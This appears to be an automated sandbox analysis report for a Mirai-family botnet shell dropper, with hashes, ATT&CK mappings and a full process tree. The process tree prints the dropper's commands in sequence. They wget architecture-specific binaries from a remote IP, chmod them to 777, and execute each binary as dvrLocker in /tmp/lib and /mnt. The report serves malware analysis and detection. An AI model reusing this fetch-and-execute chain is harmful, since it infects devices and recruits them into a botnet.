Analysis
-
max time kernel
60s -
max time network
65s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
09-11-2024 03:32
Static task
static1
Behavioral task
behavioral1
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
-
Size
923B
-
MD5
5419b553750dc94cb55eecefce2e1950
-
SHA1
bf1c8a80bcecfe13f81279a0392031d661e736ef
-
SHA256
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049
-
SHA512
fb4d326c895be35fef16ae64708323567f6cbdd66267cb61e5de47e36289189a0295a6fcc2dd8482ab143e022d79ef846da37215735cc84931aafd01b7404d6e
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 24 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 873 chmod 878 chmod 884 chmod 889 chmod 924 chmod 944 chmod 979 chmod 894 chmod 899 chmod 904 chmod 913 chmod 953 chmod 962 chmod 974 chmod 984 chmod 816 chmod 826 chmod 834 chmod 860 chmod 935 chmod 969 chmod 850 chmod 867 chmod 989 chmod -
Executes dropped EXE 24 IoCs
Processes:
dvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerdvrLockerioc pid process /tmp/lib/dvrLocker 818 dvrLocker /tmp/lib/dvrLocker 827 dvrLocker /tmp/lib/dvrLocker 836 dvrLocker /tmp/lib/dvrLocker 852 dvrLocker /tmp/lib/dvrLocker 862 dvrLocker /tmp/lib/dvrLocker 868 dvrLocker /tmp/lib/dvrLocker 874 dvrLocker /tmp/lib/dvrLocker 879 dvrLocker /mnt/dvrLocker 885 dvrLocker /mnt/dvrLocker 890 dvrLocker /mnt/dvrLocker 895 dvrLocker /mnt/dvrLocker 900 dvrLocker /mnt/dvrLocker 905 dvrLocker /mnt/dvrLocker 915 dvrLocker /mnt/dvrLocker 925 dvrLocker /mnt/dvrLocker 936 dvrLocker /mnt/dvrLocker 945 dvrLocker /mnt/dvrLocker 954 dvrLocker /mnt/dvrLocker 963 dvrLocker /mnt/dvrLocker 970 dvrLocker /mnt/dvrLocker 975 dvrLocker /mnt/dvrLocker 980 dvrLocker /mnt/dvrLocker 985 dvrLocker /mnt/dvrLocker 990 dvrLocker -
Processes:
lslslslslslslslslslslslslslslslslslslslslslslslslslsmkdirlslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslslsdescription ioc process File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls File opened for reading /proc/filesystems ls -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetrmwgetrmwgetpid process 892 rm 949 wget 957 rm 821 wget 829 rm 888 wget -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes:
becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.shdescription ioc process File opened for modification /tmp/lib/dvrLocker becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh
Processes
-
/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh/tmp/becb09b3bdc89012d8332651976512f971234839ecb2d385e17988a67f2d9049.sh1⤵
- Writes file to tmp directory
PID:696 -
/bin/lsls -l /proc/1/exe2⤵
- Reads runtime system information
PID:700 -
/bin/lsls -l /proc/10/exe2⤵
- Reads runtime system information
PID:706 -
/bin/lsls -l /proc/105/exe2⤵
- Reads runtime system information
PID:709 -
/bin/lsls -l /proc/11/exe2⤵
- Reads runtime system information
PID:712 -
/bin/lsls -l /proc/115/exe2⤵
- Reads runtime system information
PID:715 -
/bin/lsls -l /proc/116/exe2⤵
- Reads runtime system information
PID:718 -
/bin/lsls -l /proc/12/exe2⤵PID:722
-
/bin/lsls -l /proc/13/exe2⤵
- Reads runtime system information
PID:725 -
/bin/lsls -l /proc/14/exe2⤵
- Reads runtime system information
PID:726 -
/bin/lsls -l /proc/142/exe2⤵
- Reads runtime system information
PID:728 -
/bin/lsls -l /proc/149/exe2⤵
- Reads runtime system information
PID:730 -
/bin/lsls -l /proc/15/exe2⤵
- Reads runtime system information
PID:731 -
/bin/lsls -l /proc/16/exe2⤵
- Reads runtime system information
PID:734 -
/bin/lsls -l /proc/166/exe2⤵
- Reads runtime system information
PID:736 -
/bin/lsls -l /proc/17/exe2⤵
- Reads runtime system information
PID:737 -
/bin/lsls -l /proc/18/exe2⤵
- Reads runtime system information
PID:739 -
/bin/lsls -l /proc/19/exe2⤵
- Reads runtime system information
PID:740 -
/bin/lsls -l /proc/2/exe2⤵
- Reads runtime system information
PID:741 -
/bin/lsls -l /proc/20/exe2⤵
- Reads runtime system information
PID:743 -
/bin/lsls -l /proc/21/exe2⤵
- Reads runtime system information
PID:744 -
/bin/lsls -l /proc/22/exe2⤵
- Reads runtime system information
PID:745 -
/bin/lsls -l /proc/23/exe2⤵
- Reads runtime system information
PID:746 -
/bin/lsls -l /proc/239/exe2⤵PID:747
-
/bin/lsls -l /proc/24/exe2⤵
- Reads runtime system information
PID:748 -
/bin/lsls -l /proc/3/exe2⤵
- Reads runtime system information
PID:749 -
/bin/lsls -l /proc/323/exe2⤵
- Reads runtime system information
PID:750 -
/bin/lsls -l /proc/326/exe2⤵
- Reads runtime system information
PID:751 -
/bin/lsls -l /proc/328/exe2⤵
- Reads runtime system information
PID:752 -
/bin/lsls -l /proc/330/exe2⤵
- Reads runtime system information
PID:753 -
/bin/lsls -l /proc/334/exe2⤵
- Reads runtime system information
PID:754 -
/bin/lsls -l /proc/36/exe2⤵
- Reads runtime system information
PID:755 -
/bin/lsls -l /proc/37/exe2⤵
- Reads runtime system information
PID:756 -
/bin/lsls -l /proc/374/exe2⤵PID:757
-
/bin/lsls -l /proc/376/exe2⤵
- Reads runtime system information
PID:758 -
/bin/lsls -l /proc/386/exe2⤵
- Reads runtime system information
PID:759 -
/bin/lsls -l /proc/390/exe2⤵
- Reads runtime system information
PID:760 -
/bin/lsls -l /proc/4/exe2⤵
- Reads runtime system information
PID:761 -
/bin/lsls -l /proc/486/exe2⤵
- Reads runtime system information
PID:762 -
/bin/lsls -l /proc/491/exe2⤵
- Reads runtime system information
PID:763 -
/bin/lsls -l /proc/5/exe2⤵
- Reads runtime system information
PID:764 -
/bin/lsls -l /proc/532/exe2⤵
- Reads runtime system information
PID:765 -
/bin/lsls -l /proc/533/exe2⤵
- Reads runtime system information
PID:766 -
/bin/lsls -l /proc/6/exe2⤵
- Reads runtime system information
PID:767 -
/bin/lsls -l /proc/674/exe2⤵
- Reads runtime system information
PID:768 -
/bin/lsls -l /proc/688/exe2⤵
- Reads runtime system information
PID:769 -
/bin/lsls -l /proc/689/exe2⤵
- Reads runtime system information
PID:770 -
/bin/lsls -l /proc/69/exe2⤵
- Reads runtime system information
PID:771 -
/bin/lsls -l /proc/691/exe2⤵
- Reads runtime system information
PID:772 -
/bin/lsls -l /proc/693/exe2⤵
- Reads runtime system information
PID:773 -
/bin/lsls -l /proc/694/exe2⤵
- Reads runtime system information
PID:774 -
/bin/lsls -l /proc/695/exe2⤵
- Reads runtime system information
PID:775 -
/bin/lsls -l /proc/696/exe2⤵
- Reads runtime system information
PID:776 -
/bin/lsls -l /proc/698/exe2⤵
- Reads runtime system information
PID:777 -
/bin/lsls -l /proc/7/exe2⤵
- Reads runtime system information
PID:778 -
/bin/lsls -l /proc/70/exe2⤵
- Reads runtime system information
PID:779 -
/bin/lsls -l /proc/71/exe2⤵
- Reads runtime system information
PID:780 -
/bin/lsls -l /proc/72/exe2⤵
- Reads runtime system information
PID:781 -
/bin/lsls -l /proc/73/exe2⤵
- Reads runtime system information
PID:782 -
/bin/lsls -l /proc/74/exe2⤵
- Reads runtime system information
PID:783 -
/bin/lsls -l /proc/76/exe2⤵
- Reads runtime system information
PID:784 -
/bin/lsls -l /proc/77/exe2⤵
- Reads runtime system information
PID:785 -
/bin/lsls -l /proc/78/exe2⤵
- Reads runtime system information
PID:788 -
/bin/lsls -l /proc/79/exe2⤵
- Reads runtime system information
PID:789 -
/bin/lsls -l /proc/8/exe2⤵
- Reads runtime system information
PID:791 -
/bin/lsls -l /proc/82/exe2⤵
- Reads runtime system information
PID:793 -
/bin/lsls -l /proc/9/exe2⤵
- Reads runtime system information
PID:795 -
/bin/rmrm -rf /tmp/lib/2⤵PID:797
-
/bin/rmrm -rf /tmp/lib/dvrLocker2⤵PID:798
-
/bin/mkdirmkdir /tmp/lib/2⤵
- Reads runtime system information
PID:799 -
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:801
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:816 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:818 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:818
-
/bin/rmrm -rf tmpsl2⤵PID:820
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:821 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:826 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:827 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:827
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:829 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:830
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:834 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:836 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:836
-
/bin/rmrm -rf tarm2⤵PID:839
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:844
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:850 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:852 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:852
-
/bin/rmrm -rf tarm52⤵PID:854
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:855
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:860 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:862 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:862
-
/bin/rmrm -rf tppc2⤵PID:864
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:865
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:867 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:868 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:868
-
/bin/rmrm -rf tarm72⤵PID:871
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:872
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:873 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:874 -
/bin/rmrm -rf x862⤵PID:876
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:877
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:878 -
/tmp/lib/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:879 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:879
-
/bin/rmrm -rf tarm62⤵PID:881
-
/bin/rmrm -rf /mnt/dvrLocker2⤵PID:882
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:883
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:884 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:885 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:885
-
/bin/rmrm -rf tmpsl2⤵PID:887
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:888 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:889 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:890 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:890
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:892 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:893
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:894 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:895 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:895
-
/bin/rmrm -rf tarm2⤵PID:897
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:898
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:899 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:900 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:900
-
/bin/rmrm -rf tarm52⤵PID:902
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:903
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:904 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:905 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:905
-
/bin/rmrm -rf tppc2⤵PID:908
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:910
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:913 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:915 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:915
-
/bin/rmrm -rf tarm72⤵PID:917
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:919
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:924 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:925 -
/bin/rmrm -rf x862⤵PID:929
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:930
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:935 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:936 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:936
-
/bin/rmrm -rf tarm62⤵PID:938
-
/usr/bin/wgetwget http://45.202.35.91/tmpsl -O -2⤵PID:940
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:944 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:945 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:945
-
/bin/rmrm -rf tmpsl2⤵PID:948
-
/usr/bin/wgetwget http://45.202.35.91/tmips -O -2⤵
- System Network Configuration Discovery
PID:949 -
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:953 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:954 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:954
-
/bin/rmrm -rf tmips2⤵
- System Network Configuration Discovery
PID:957 -
/usr/bin/wgetwget http://45.202.35.91/tarm -O -2⤵PID:959
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:962 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:963 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:963
-
/bin/rmrm -rf tarm2⤵PID:966
-
/usr/bin/wgetwget http://45.202.35.91/tarm5 -O -2⤵PID:968
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:969 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:970 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:970
-
/bin/rmrm -rf tarm52⤵PID:972
-
/usr/bin/wgetwget http://45.202.35.91/tppc -O -2⤵PID:973
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:974 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:975 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:975
-
/bin/rmrm -rf tppc2⤵PID:977
-
/usr/bin/wgetwget http://45.202.35.91/tarm7 -O -2⤵PID:978
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:979 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:980 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:980
-
/bin/rmrm -rf tarm72⤵PID:982
-
/usr/bin/wgetwget http://45.202.35.91/x86 -O -2⤵PID:983
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:984 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:985 -
/bin/rmrm -rf x862⤵PID:987
-
/usr/bin/wgetwget http://45.202.35.91/tarm6 -O -2⤵PID:988
-
/bin/chmodchmod 777 dvrLocker2⤵
- File and Directory Permissions Modification
PID:989 -
/mnt/dvrLocker./dvrLocker tplink.new2⤵
- Executes dropped EXE
PID:990 -
/bin/sh/bin/sh ./dvrLocker tplink.new2⤵PID:990
-
/bin/rmrm -rf tarm62⤵PID:992
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
93KB
MD5bb9275394716c60d1941432c7085ca13
SHA143f6e51ca69e70abb7d6cfd7f11f15df3fcc97cc
SHA2563c0eb5de2946c558159a6b6a656d463febee037c17a1f605330e601cfcd39615
SHA512047ec8451a8d35ac67c7ff26e145cfe5536d94ef1a7d280d2e70dc4c3ed7dfd1386a957e1b76f50c10429774df02964d48d50d6bb8debc2c9a3bcced833b125d